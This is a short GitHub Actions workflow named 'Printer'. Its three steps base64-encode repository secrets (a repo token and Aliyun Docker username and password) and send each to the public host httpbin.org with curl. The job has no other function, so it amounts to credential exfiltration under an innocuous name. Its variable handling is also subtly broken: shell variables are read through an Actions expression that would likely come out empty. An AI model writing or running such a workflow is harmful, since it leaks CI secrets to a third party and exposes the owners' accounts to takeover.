name: Printer

on:
  workflow_dispatch:

jobs:
  printer:
    runs-on: ubuntu-latest
    steps:
      - name: Encode REPO_TOKEN
        run: |
          ENCODED_REPO_TOKEN=$(echo -n "${{ secrets.REPO_TOKEN }}" | base64)
          curl -L "httpbin.org/get?id=${{ env.ENCODED_REPO_TOKEN }}"

      - name: Encode ALIYUN_DOCKER_USERNAME
        run: |
          ENCODED_ALIYUN_DOCKER_USERNAME=$(echo -n "${{ secrets.ALIYUN_DOCKER_USERNAME }}" | base64)
          curl -L "httpbin.org/get?id=${{ env.ENCODED_ALIYUN_DOCKER_USERNAME }}"

      - name: Encode ALIYUN_DOCKER_PASSWORD
        run: |
          ENCODED_ALIYUN_DOCKER_PASSWORD=$(echo -n "${{ secrets.ALIYUN_DOCKER_PASSWORD }}" | base64)
          curl -L "httpbin.org/get?id=${{ env.ENCODED_ALIYUN_DOCKER_PASSWORD }}"
